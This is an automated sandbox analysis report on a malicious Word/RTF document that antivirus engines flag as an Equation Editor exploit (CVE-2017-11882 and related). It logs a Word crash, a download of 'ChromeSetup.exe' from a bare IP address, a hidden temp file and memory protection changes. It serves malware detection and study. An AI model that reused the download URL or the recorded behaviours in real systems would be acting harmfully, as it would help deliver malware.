RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1621692
registers.edi: 1974991376
registers.eax: 1621692
registers.ebp: 1621772
registers.edx: 0
registers.ebx: 75529548
registers.esi: 2147944122
registers.ecx: 2846981211

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://192.3.108.47/test/ChromeSetup.exe
suspicious_features	POST method with no referer header	suspicious_request	POST https://update.googleapis.com/service/update2
suspicious_features	POST method with no referer header	suspicious_request	POST https://update.googleapis.com/service/update2?cup2key=11:7Gz5hy99G0OJGwmw-g8p-blMoWYIGYN02Dr48kg3q48&cup2hreq=7a6509b0222169109f7b96e446becc365cb6859e88bdecbd3f898226ad48db9e

Performs some HTTP requests (7 events)

request	GET http://192.3.108.47/test/ChromeSetup.exe
request	HEAD http://edgedl.me.gvt1.com/edgedl/release2/chrome/czao2hrvpk5wgqrkz4kks5r734_109.0.5414.120/109.0.5414.120_chrome_installer.exe
request	GET http://edgedl.me.gvt1.com/edgedl/release2/chrome/czao2hrvpk5wgqrkz4kks5r734_109.0.5414.120/109.0.5414.120_chrome_installer.exe
request	HEAD http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhemejginpboagddgdfbepgmp_414_all_ZZ_acz2kiivwz66gcmd564fvjnnf4sa.crx3
request	GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhemejginpboagddgdfbepgmp_414_all_ZZ_acz2kiivwz66gcmd564fvjnnf4sa.crx3
request	POST https://update.googleapis.com/service/update2
request	POST https://update.googleapis.com/service/update2?cup2key=11:7Gz5hy99G0OJGwmw-g8p-blMoWYIGYN02Dr48kg3q48&cup2hreq=7a6509b0222169109f7b96e446becc365cb6859e88bdecbd3f898226ad48db9e

Sends data using the HTTP POST Method (2 events)

request	POST https://update.googleapis.com/service/update2
request	POST https://update.googleapis.com/service/update2?cup2key=11:7Gz5hy99G0OJGwmw-g8p-blMoWYIGYN02Dr48kg3q48&cup2hreq=7a6509b0222169109f7b96e446becc365cb6859e88bdecbd3f898226ad48db9e

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process WINWORD.EXE with pid 1836 crashed
__exception__ Sept. 30, 2023, 1:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75bb1414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68 wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510 DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760 DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219 DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295 DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0 DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878 DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818 ?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677 DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88 DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365 DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03 wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1622000 registers.edi: 1974991376 registers.eax: 1622000 registers.ebp: 1622080 registers.edx: 0 registers.ebx: 75475404 registers.esi: 2147944126 registers.ecx: 2846981211	1	0	0
__exception__ Sept. 30, 2023, 1:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x75b6b641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x75b6b5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x75b6b172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x75b6a66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x75bea68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x75bc77e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x75bb14b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68 wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510 DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760 DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219 DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295 DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0 DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878 DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818 ?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677 DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88 DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365 DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03 wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 1621692 registers.edi: 1974991376 registers.eax: 1621692 registers.ebp: 1621772 registers.edx: 0 registers.ebx: 75529548 registers.esi: 2147944122 registers.ecx: 2846981211	1	0	0

Application Crash

Process WINWORD.EXE with pid 1836 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 30, 2023, 1:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75bb1414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68
wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510
DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e
DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760
DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219
DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb
DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295
DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0
DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d
DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878
DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a
DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818
?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677
DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88
DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365
DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada
FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03
wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

__exception__

Sept. 30, 2023, 1:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x75b6b641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x75b6b5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x75b6b172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x75b6a66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x75bea68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x75bc77e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x75bb14b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68
wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510
DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e
DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760
DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219
DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb
DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295
DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0
DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d
DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878
DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a
DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818
?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677
DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88
DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365
DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada
FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03
wdCommandDispatch-0x370 winword+0x15c4 @ 0xe715c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0xe71558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1621692
registers.edi: 1974991376
registers.eax: 1621692
registers.ebp: 1621772
registers.edx: 0
registers.ebx: 75529548
registers.esi: 2147944122
registers.ecx: 2846981211

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$I0ioio0OIOIO0IOI0ioi0i0000000##############000000000000000000##############00000000.doc

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Sept. 30, 2023, 1:24 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000484 filepath: C:\Users\test22\AppData\Local\Temp\~$I0ioio0OIOIO0IOI0ioi0i0000000##############000000000000000000##############00000000.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$I0ioio0OIOIO0IOI0ioi0i0000000##############000000000000000000##############00000000.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 30, 2023, 1:24 p.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Communicates with host for which no DNS query was performed (9 events)

host	142.250.206.238
host	142.250.66.67
host	142.250.76.131
host	142.251.222.195
host	172.217.161.225
host	172.217.161.234
host	172.217.25.170
host	172.217.25.174
host	192.3.108.47

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

CAT-QuickHeal	Exp.RTF.Obfus.Gen
ALYac	Exploit.RTF-ObfsObjDat.Gen
Sangfor	Malware.Generic-RTF.Save.4aa2c45b
Symantec	Exp.CVE-2017-11882!g5
ESET-NOD32	multiple detections
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender	Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus	Exploit.Rtf.Heuristic-rtf.dinbqn
MicroWorld-eScan	Exploit.RTF-ObfsObjDat.Gen
Rising	Exploit.CVE-2017-11882!1.E8F8 (CLASSIC)
Emsisoft	Exploit.RTF-ObfsObjDat.Gen (B)
F-Secure	Heuristic.HEUR/Rtf.Malformed
DrWeb	Exploit.CVE-2018-0798.4
VIPRE	Exploit.RTF-ObfsObjDat.Gen
TrendMicro	HEUR_RTFMALFORM
FireEye	Exploit.RTF-ObfsObjDat.Gen
GData	Exploit.RTF-ObfsObjDat.Gen
Avira	HEUR/Rtf.Malformed
Arcabit	Exploit.RTF-ObfsObjDat.Gen
ZoneAlarm	HEUR:Exploit.MSOffice.CVE-2018-0802.gen
Microsoft	Trojan:Script/Wacatac.H!ml
Google	Detected
AhnLab-V3	RTF/Malform-A.Gen
McAfee	RTFObfustream.c!750637AA4ADC
MAX	malware (ai score=84)
Zoner	Probably Heur.RTFBadHeader
Ikarus	Exploit.CVE-2017-11882
Fortinet	MSOffice/CVE_2018_0798.BOR!exploit

IOI0ioio0OIOIO0IOI0ioi0i0000000%23%23%23%23%23%23%23%23%23%23%23%23%23%23000000000000000000%23%23%23%23%23%23%23%23%23%23%23%23%23%2300000000.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All